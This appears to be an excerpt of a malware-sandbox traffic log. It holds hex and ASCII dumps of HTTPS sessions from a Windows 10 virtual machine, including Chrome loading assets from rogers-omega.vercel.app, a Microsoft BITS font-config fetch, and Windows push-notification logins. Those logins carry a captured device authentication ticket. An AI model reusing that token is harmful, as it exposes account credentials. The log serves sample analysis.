                                                      Data Ascii: String();return e.setAttribute("id",i),this._isAnimated()&&e.classList.add(Zi),e}setContent(t){this._newContent=t,this._isShown()&&(this._disposePopper(),this.show())}_getTemplateFactory(t){return this._templateFactory?this._templateFactory.changeContent(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      17192.168.2.64974476.76.21.1644434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:36 UTC602OUTGET /favicon.ico HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://rogers-omega.vercel.app/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:36 UTC363INHTTP/1.1 404 Not Found
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Length: 39
                                                      Content-Type: text/plain; charset=utf-8
                                                      Date: Sun, 29 Sep 2024 05:50:36 GMT
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Error: NOT_FOUND
                                                      X-Vercel-Id: iad1::n9269-1727589036133-a1ab4ab92ef3
                                                      Connection: close
                                                      2024-09-29 05:50:36 UTC39INData Raw: 54 68 65 20 70 61 67 65 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 0a 0a 4e 4f 54 5f 46 4f 55 4e 44 0a
                                                      Data Ascii: The page could not be foundNOT_FOUND


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      18192.168.2.64974876.76.21.2414434420C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:36 UTC368OUTGET /assets/rogers_bgr.jpg HTTP/1.1
                                                      Host: rogers-omega.vercel.app
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2024-09-29 05:50:36 UTC504INHTTP/1.1 200 OK
                                                      Accept-Ranges: bytes
                                                      Access-Control-Allow-Origin: *
                                                      Age: 152751
                                                      Cache-Control: public, max-age=0, must-revalidate
                                                      Content-Disposition: inline; filename="rogers_bgr.jpg"
                                                      Content-Length: 177323
                                                      Content-Type: image/jpeg
                                                      Date: Sun, 29 Sep 2024 05:50:36 GMT
                                                      Etag: "c9a3247d3438db85783b90f66cfe90da"
                                                      Server: Vercel
                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                      X-Vercel-Cache: HIT
                                                      X-Vercel-Id: iad1::b8mx5-1727589036264-3a2bf8130ff9
                                                      Connection: close
                                                      2024-09-29 05:50:36 UTC2372INData Raw: ff d8 ff db 00 84 00 04 03 03 03 03 03 04 03 03 04 06 04 03 04 06 07 05 04 04 05 07 08 07 07 07 07 07 08 0b 08 09 09 09 09 08 0b 0b 0c 0c 0c 0c 0c 0b 0d 0d 0e 0e 0d 0d 12 12 12 12 12 14 14 14 14 14 14 14 14 14 14 01 05 05 05 08 08 08 10 0b 0b 10 14 0e 0e 0e 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff dd 00 04 00 b4 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff c0 00 11 08 03 c0 05 a0 03 00 11 00 01 11 01 02 11 01 ff c4 00 bd 00 00 01 05 01 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 10 00 01 03 02 04 03 05 03 08 07 05 05 05 07 02 07 01 00 02 03 04
                                                      Data Ascii: Adobed
                                                      2024-09-29 05:50:36 UTC1051INData Raw: ee ab 34 88 84 8f 9a 2a 54 54 15 1b 7c 51 0b 1f 81 0d 2a bf c6 82 66 28 1b 2f 89 55 39 de 04 10 15 02 2a 9a 45 19 ef 39 0d 1a ef 11 40 bc ac 8a 50 10 2a 01 00 80 40 9a a0 54 08 45 d0 22 01 00 81 2c 81 10 08 04 09 64 02 01 60 09 b0 8a ec 16 51 48 80 40 20 4b 6a 88 08 b2 04 54 08 10 a0 44 02 01 00 81 2c 81 50 1c d0 28 50 4e cd 90 57 93 72 81 18 3b aa ec 44 77 51 0c 72 07 35 5d a9 c3 54 0e 1a 26 80 9a 16 b0 ff 00 d2 5a aa 69 b8 11 b8 55 02 a0 10 22 08 e5 f0 bb d1 58 cd 62 cc a6 92 34 b0 ef d1 da a9 8d 5c 51 b0 80 40 20 10 08 04 02 01 00 80 40 20 64 9e 12 ab 35 8b 51 cd 46 6a f6 1a 7e 60 7a 95 56 2f 22 84 02 01 03 24 f0 94 46 25 46 ee f5 50 53 3b a8 1a 81 0a 04 28 a8 c3 86 62 b2 27 67 25 42 48 81 b6 d1 41 5a 5d ca a2 32 39 a8 1a 3c 48 2d 47 b2 a2 76 a4 44 80
                                                      Data Ascii: 4*TT|Q*f(/U9*E9@P*@TE",d`QH@ KjTD,P(PNWr;DwQr5]T&ZiU"Xb4\Q@ @ d5QFj~`zV/"$F%FPS;(b'g%BHAZ]29<H-GvD
                                                      2024-09-29 05:50:36 UTC4744INData Raw: b6 0d b2 a2 8b de 5d f1 0b 3b 56 85 0d 54 6c 8c 31 e6 c4 2d 0b cd a8 88 eb 98 7d a9 a3 c9 20 91 a7 62 13 47 91 73 26 97 65 b8 43 62 e0 a2 ce c6 8a 1a 08 0b a0 10 08 02 85 22 a8 6b fc 25 19 ac 5a 8e 7e aa 25 5d c3 7e 84 7a 95 56 2f a3 41 00 88 10 35 fb 14 4a c4 a9 dc a8 29 28 1a 81 0a 08 e4 f0 94 be 95 cf d6 c9 27 6e 03 76 ba c0 dd a0 b9 8c 5d 6a 0b 12 6e 81 39 28 2b 4b e2 54 44 54 00 dd 08 b3 1e ca ad 4e d4 8c a4 6a a1 c1 50 f1 b2 07 85 43 c2 07 04 0e 0a a1 c3 64 0a 81 42 05 40 28 a1 00 80 40 20 10 08 04 02 01 02 2a 81 02 14 08 80 40 20 42 10 22 01 01 64 02 04 25 02 20 10 22 8a 10 08 1a 81 0a 04 40 db 20 10 34 ee 82 0a ef d0 aa 7f 74 ff 00 e5 28 3f ff d3 fa df 0e 60 38 7d 26 9f ee 63 fe 40 b4 c2 d0 60 e8 88 5c 81 03 4c 61 14 06 20 52 c4 12 46 dc ad b2 80
                                                      Data Ascii: ];VTl1-} bGs&eCb"k%Z~%]~zV/A5J)('nv]jn9(+KTDTNjPCdB@(@ *@ B"d% "@ 4t(?`8}&c@`\La RF
                                                      2024-09-29 05:50:36 UTC5930INData Raw: 35 03 90 0a c0 b7 56 1b 5a c3 bf 4b 6a a7 db 79 65 b0 80 40 20 10 35 fe 12 ac 4c 98 d5 1c d5 62 2f e1 df a3 35 4a d6 2b 8a 34 10 08 04 02 01 00 80 40 20 10 08 04 08 ed 95 4a c8 a9 f1 1f 55 59 8b 38 67 d0 9f 52 89 3d af ac ba 04 02 01 54 34 ec 8c d6 45 4f 88 a0 ce 77 88 a9 42 28 04 08 55 10 9f 12 cd 54 cc 1a 84 0b 22 21 a3 65 05 79 77 55 50 9e aa 06 8f 12 0b 51 ec 15 16 02 b1 12 05 44 81 03 c2 b0 48 10 38 2a 87 84 0a 10 39 14 28 14 6c 81 50 08 04 02 05 08 10 ee 80 40 20 10 0a ae c2 04 2a 1a 22 20 40 8a a0 40 20 08 40 72 40 d4 02 04 b6 a8 14 a0 6a 00 20 6a 01 02 15 14 20 42 10 21 08 10 ec 81 10 21 41 5a bb f4 2a 9f dd 3f f9 4a 0f ff d5 fb 03 0d ff 00 67 52 7e e2 3f e4 08 8b 28 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 10 21
                                                      Data Ascii: 5VZKjye@ 5Lb/5J+4@ JUY8gR=T4EOwB(UT"!eywUPQDH8*9(lP@ *" @@ @r@j j B!!AZ*?JgR~?(@ @ @ !
                                                      2024-09-29 05:50:36 UTC7116INData Raw: dc 66 1a 6a b1 95 b5 b9 8c 89 1d 3d 37 63 04 0d b3 66 00 99 7b ce 21 fa 93 de 6d c0 b8 bd 96 31 6f 60 57 42 61 ca c7 f6 93 80 19 23 6e 6e 49 24 de e7 7b 5c 68 b3 6b 51 56 9f 1e 96 0a b8 e6 78 31 d4 3a 4e d0 31 8e 20 39 8d 1b 12 d3 cc 68 b5 8d d3 19 4d b7 cf 1e 62 af 86 36 4b 2c 8e a4 6e 58 db 1c 37 6b 7b 3b 17 36 32 05 81 6b 7a f8 8f 55 3c ea f8 47 49 1f b4 16 c2 69 26 6e 79 d9 4d 23 4c d1 87 02 e7 c7 6c a5 99 bc 5b 3b a7 ad d5 fc 95 9b c5 b7 5b 85 f1 e6 1d 59 53 0d 45 44 a2 68 1f 4c f6 c0 5c f0 67 13 6a ec e2 d6 70 0d 24 35 9e 5c 97 6c 79 9c ef 0c 7a 87 08 71 e6 0f 5f 87 45 4a fa a1 ef 6c 04 16 3d f7 7b 5c 09 cd 98 3a c7 71 75 e8 c3 9a 57 9b 2e 1b 1d a5 3e 2b 4b 27 66 fc e5 d1 ef 1c d1 8c cd 21 db f8 41 b0 f5 5d a6 5b 72 b8 e9 6c ba 17 bd a1 d2 59 c4 f7
                                                      Data Ascii: fj=7cf{!m1o`WBa#nnI${\hkQVx1:N1 9hMb6K,nX7k{;62kzU<GIi&nyM#Ll[;[YSEDhL\gjp$5\lyzq_EJl={\:quW.>+K'f!A][rlY
                                                      2024-09-29 05:50:36 UTC8302INData Raw: e6 e3 86 79 47 33 c4 55 3d 84 50 32 17 b6 49 59 e3 96 36 58 12 49 b0 b7 a2 ef 8e 2f 36 55 14 2e ef b6 59 0b bf bb 96 87 96 82 33 3a d7 2d d2 e0 eb e4 a6 5e d2 28 55 b2 a2 bc be 43 10 8d 91 02 e7 69 a8 bb ba 01 d5 5d 96 26 c3 f0 ca ba a6 90 e6 b9 d2 78 5c c0 eb 7c db 45 c8 06 fa 9d 2f 94 2b 6a c8 bb 3f 0f d2 09 45 4c 51 f6 ae 8c 06 39 d5 0f ca 09 b5 ec c6 6b a8 3b 92 56 3c a9 e2 96 5c 30 c6 49 74 6f 31 3d b9 db 20 37 78 3c da eb 9d 42 df 93 36 20 32 be 20 7b 3e fc 24 86 86 92 d2 4e 9b 90 01 b7 92 95 24 55 9e ae 26 46 20 73 f2 91 a3 58 5c 1c 58 dd c3 48 02 df 7a d4 56 0d 55 64 b2 e8 fe eb 39 b5 b6 00 79 8b 2a 87 9e c5 f1 38 3c 16 b8 01 62 d3 a1 16 e9 d5 11 52 29 1b 1f 6a d1 a5 85 da 48 d4 df 4e 6a 9b 32 29 9d 4d 28 95 8f cc c9 3b b2 46 ed 41 d7 65 2c 59 d3
                                                      Data Ascii: yG3U=P2IY6XI/6U.Y3:-^(UCi]&x\|E/+j?ELQ9k;V<\0Ito1= 7x<B6 2 {>$N$U&F sX\XHzVUd9y*8<bR)jHNj2)M(;FAe,Y
                                                      2024-09-29 05:50:36 UTC6676INData Raw: 87 ba 49 22 b8 89 e5 b3 4c f3 9d f2 b4 36 d7 b9 3c af a0 2b 1c 92 d8 df 16 53 c9 f3 df 19 47 1f 7a 41 29 8e 27 0b 89 5c 7c 4e 22 c7 42 34 b8 f8 ac f1 5d 3b 72 cd bc b6 b7 14 c4 a2 63 a8 a3 79 f7 0b 87 ba 26 80 1b cf 29 cb b8 77 45 ec c7 c5 e3 b3 26 70 9d f5 e1 f3 56 66 ee b5 cc 69 e4 4f 53 e4 4d 96 e3 36 30 aa 98 e9 cb dc e1 a6 e4 f3 bd b7 ba eb 8d 71 ca 32 24 25 8d b3 8e fd 3a ae bb 71 b1 35 13 7b 5a 88 61 71 cc c7 bd ad b1 d7 42 57 3e 5f ed ae 9c 33 f7 c7 de 9e cc 30 d8 a9 70 9a 46 86 d8 86 80 47 c2 cb e4 f0 7a db ed fc 99 ab a7 59 89 1c b2 48 e0 2f 63 6d 16 b9 32 73 e3 9b 71 78 ac a5 ce 70 16 d4 2f 36 75 ed c3 17 0f 8a 4b 79 08 69 3a 74 5c eb d3 8c e9 ca d7 38 39 a5 84 6b c8 94 85 60 d5 86 bb 7d 86 f6 e6 ba 4a e5 63 12 ae 16 3c f4 be db 2e f8 e4 f3 e5
                                                      Data Ascii: I"L6<+SGzA)'\|N"B4];rcy&)wE&pVfiOSM60q2$%:q5{ZaqBW>_30pFGzYH/cm2sqxp/6uKyi:t\89k`}Jc<.
                                                      2024-09-29 05:50:36 UTC10674INData Raw: a1 54 fe e9 ff 00 ca 50 7f ff d1 fb 03 0d ff 00 67 52 7e e2 3f e4 08 8b 28 04 02 01 00 80 40 20 86 55 a6 52 b3 56 85 16 15 45 08 04 02 01 00 80 40 20 10 08 04 02 01 00 80 40 20 09 54 a6 15 59 0d 40 e5 17 61 02 85 16 21 9b c2 56 99 66 c9 b9 46 51 a8 a7 43 f4 88 27 3f 4a aa a5 9b c0 50 52 84 f7 ca 1a 5c 66 ad 41 5d 9f 4c 50 3e a3 6b 29 66 c6 75 54 42 56 96 9e 61 73 e6 c2 67 87 8b 36 6d ca 56 d3 18 25 70 b7 77 92 fc 8f ca e0 bc 79 69 ca c5 51 21 69 04 1b 38 2e 1c 77 57 a4 6d 61 98 98 7f cd 48 6c e1 a6 ab f4 9f 07 e5 cc bf b9 bc 72 6d b4 82 2e 0d c2 fa 8e bb 2a 02 e8 1a 80 50 66 63 17 34 cf b7 42 a6 fa 63 97 d3 cf cb 4b 5c 2f d7 55 c3 7d be 6f db a2 c1 de 2c 1b 75 d3 1a f5 fc 7b f4 de 6a db d2 78 3b 29 45 6c 46 41 15 2b dc 4d ac d2 b9 73 e5 ac 5c f9 ae b1 73
                                                      Data Ascii: TPgR~?(@ URVE@ @ TY@a!VfFQC'?JPR\fA]LP>k)fuTBVasg6mV%pwyiQ!i8.wWmaHlrm.*Pfc4BcK\/U}o,u{jx;)ElFA+Ms\s
                                                      2024-09-29 05:50:36 UTC11860INData Raw: c3 b0 c7 09 c8 f9 ca 8a a7 ba 6b 1e 8c 6b bb bf 12 17 ca cb 2a fd 6e 1c 5e 33 ad 3c e2 be 9e aa aa 41 13 4e 48 87 d4 6e de ba 68 a5 e4 72 cf 08 7c 74 4c a7 60 60 b3 9d b9 3e 6b 8d cb 6e 7e 32 27 7b 83 23 b1 eb af 5b ac e8 db 32 68 b3 ea 76 df d5 6d c5 9f 2b 6d d4 79 aa cd 8a 72 be de 57 d9 74 8c d5 71 17 69 70 45 f9 ad 32 5e c6 ce 68 f3 1a 7c 53 69 60 92 17 76 9a 0d 09 3a f4 b2 b2 b3 62 29 a9 b3 8d 3c 36 df 9f 92 d4 ae 77 12 98 f2 86 df 41 60 35 fb d4 da e9 4d ec c8 e2 40 04 bf 4f 20 37 5d b8 a7 dd 7a 38 78 7e ea ab a3 71 b8 36 b6 b7 b2 f4 3d 5f 8d 09 06 59 03 46 80 73 b6 e7 ca e8 e7 31 ed a1 15 76 26 e7 c3 4c 2b 25 7c 4c 71 31 c6 f7 17 34 12 dc a4 80 eb d8 d9 63 3c 66 8b 84 d7 65 c4 b1 09 71 09 59 4b 34 ef 94 c3 a1 6b 89 2d 6d b5 36 e5 f6 2f 3f 87 8c 7c
                                                      Data Ascii: kk*n^3<ANHnhr|tL``>kn~2'{#[2hvm+myrWtqipE2^h|Si`v:b)<6wA`5M@O 7]z8x~q6=_YFs1v&L+%|Lq14c<feqYK4k-m6/?|
                                                      2024-09-29 05:50:36 UTC10234INData Raw: 1a 50 49 e6 ee 4b 3b ed cb ca da bb 49 4a e6 8c d2 9b b8 ad ba cc 75 da ea 28 54 2d d0 04 dd 01 74 0a 0a 05 40 84 a0 54 02 01 02 04 12 35 03 1f b9 40 91 a0 43 b9 41 13 94 0e 69 ba 07 2a 16 e8 1c 81 10 22 b0 2d ec 81 15 0b 7b 20 2e 80 bf 55 04 52 0b b4 ab 13 4c 3a 8c 33 b5 9b b4 70 bd 95 95 9b 89 3e 4b 8f f5 47 d8 9b 35 07 c9 91 83 a3 45 fd 13 66 a1 cc c3 d8 d3 ab 47 d8 9b 59 8c 4b ee 8d b5 b2 fd c9 b3 40 53 34 6b 95 36 58 71 a6 6f ea a2 78 9b ee ed fd 55 4d 24 6c 2d fd 54 24 48 18 cb 6c 8b a2 96 b3 90 44 d1 03 59 fa a8 68 99 19 7d 90 d1 f9 19 71 a2 1a 41 53 18 2d 19 06 b7 51 2a ed 20 22 30 0a 8d 7d 2c a2 95 01 74 05 d0 17 40 5d 02 85 95 05 02 20 44 10 4c eb 11 7d 14 a2 56 11 61 a8 56 09 5c 7b a1 28 8d bb d9 03 25 52 8a e4 e8 a2 91 a7 bc 8a b9 1e c1 69 94
                                                      Data Ascii: PIK;IJu(T-t@T5@CAi*"-{ .URL:3p>KG5EfGYK@S4k6XqoxUM$l-T$HlDYh}qAS-Q* "0},t@] DL}VaV\{(%Ri


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.649749184.28.90.27443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:36 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Accept: */*
                                                      Accept-Encoding: identity
                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                      Range: bytes=0-2147483646
                                                      User-Agent: Microsoft BITS/7.8
                                                      Host: fs.microsoft.com
                                                      2024-09-29 05:50:37 UTC515INHTTP/1.1 200 OK
                                                      ApiVersion: Distribute 1.1
                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                      Content-Type: application/octet-stream
                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                      Server: ECAcc (lpl/EF06)
                                                      X-CID: 11
                                                      X-Ms-ApiVersion: Distribute 1.2
                                                      X-Ms-Region: prod-weu-z1
                                                      Cache-Control: public, max-age=125696
                                                      Date: Sun, 29 Sep 2024 05:50:36 GMT
                                                      Content-Length: 55
                                                      Connection: close
                                                      X-CID: 2
                                                      2024-09-29 05:50:37 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20192.168.2.64975340.115.3.253443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:50:59 UTC70OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 34 0d 0a 4d 53 2d 43 56 3a 20 38 35 43 79 72 7a 53 66 38 6b 36 4b 50 52 2f 68 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 31 62 37 37 34 34 62 66 61 63 66 64 32 0d 0a 0d 0a
                                                      Data Ascii: CNT 1 CON 304MS-CV: 85CyrzSf8k6KPR/h.1Context: 261b7744bfacfd2
                                                      2024-09-29 05:50:59 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                      2024-09-29 05:50:59 UTC1083OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 30 0d 0a 4d 53 2d 43 56 3a 20 38 35 43 79 72 7a 53 66 38 6b 36 4b 50 52 2f 68 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 31 62 37 37 34 34 62 66 61 63 66 64 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 43 7a 2f 42 6a 43 32 68 5a 41 37 6c 74 4e 61 6e 34 59 53 67 63 39 70 56 36 51 6b 76 57 59 33 63 52 6b 5a 58 37 6a 4c 4b 69 53 75 41 71 33 2f 69 2b 2b 45 47 58 7a 38 45 79 64 75 73 36 31 78 72 50 67 6b 38 6b 56 35 5a 67 52 31 54 54 66 4c 66 66 71 79 62 72 5a 34 64 61 6a 39 49 6b 6b 38 59 50 47 71 51 39 4e 66 6d 39 6f 41 69 30
                                                      Data Ascii: ATH 2 CON\DEVICE 1060MS-CV: 85CyrzSf8k6KPR/h.2Context: 261b7744bfacfd2<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfCz/BjC2hZA7ltNan4YSgc9pV6QkvWY3cRkZX7jLKiSuAq3/i++EGXz8Eydus61xrPgk8kV5ZgR1TTfLffqybrZ4daj9Ikk8YPGqQ9Nfm9oAi0
                                                      2024-09-29 05:50:59 UTC217OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 36 0d 0a 4d 53 2d 43 56 3a 20 38 35 43 79 72 7a 53 66 38 6b 36 4b 50 52 2f 68 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 36 31 62 37 37 34 34 62 66 61 63 66 64 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                      Data Ascii: BND 3 CON\WNS 0 196MS-CV: 85CyrzSf8k6KPR/h.3Context: 261b7744bfacfd2<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                      2024-09-29 05:50:59 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                      Data Ascii: 202 1 CON 58
                                                      2024-09-29 05:50:59 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6f 4b 73 52 47 48 71 7a 43 30 4f 38 4c 54 4c 41 36 48 67 6c 49 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                      Data Ascii: MS-CV: oKsRGHqzC0O8LTLA6HglIw.0Payload parsing failed.


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21192.168.2.64975740.115.3.253443
                                                      TimestampBytes transferredDirectionData
                                                      2024-09-29 05:51:34 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 50 50 57 56 37 76 65 47 4b 30 79 41 4a 6d 6f 32 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 61 61 65 33 35 32 31 34 30 38 36 62 61 63 0d 0a 0d 0a
                                                      Data Ascii: CNT 1 CON 305MS-CV: PPWV7veGK0yAJmo2.1Context: 8caae35214086bac
                                                      2024-09-29 05:51:34 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                      2024-09-29 05:51:34 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 50 50 57 56 37 76 65 47 4b 30 79 41 4a 6d 6f 32 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 63 61 61 65 33 35 32 31 34 30 38 36 62 61 63 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 66 43 7a 2f 42 6a 43 32 68 5a 41 37 6c 74 4e 61 6e 34 59 53 67 63 39 70 56 36 51 6b 76 57 59 33 63 52 6b 5a 58 37 6a 4c 4b 69 53 75 41 71 33 2f 69 2b 2b 45 47 58 7a 38 45 79 64 75 73 36 31 78 72 50 67 6b 38 6b 56 35 5a 67 52 31 54 54 66 4c 66 66 71 79 62 72 5a 34 64 61 6a 39 49 6b 6b 38 59 50 47 71 51 39 4e 66 6d 39 6f 41 69
                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: PPWV7veGK0yAJmo2.2Context: 8caae35214086bac<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAfCz/BjC2hZA7ltNan4YSgc9pV6QkvWY3cRkZX7jLKiSuAq3/i++EGXz8Eydus61xrPgk8kV5ZgR1TTfLffqybrZ4daj9Ikk8YPGqQ9Nfm9oAi
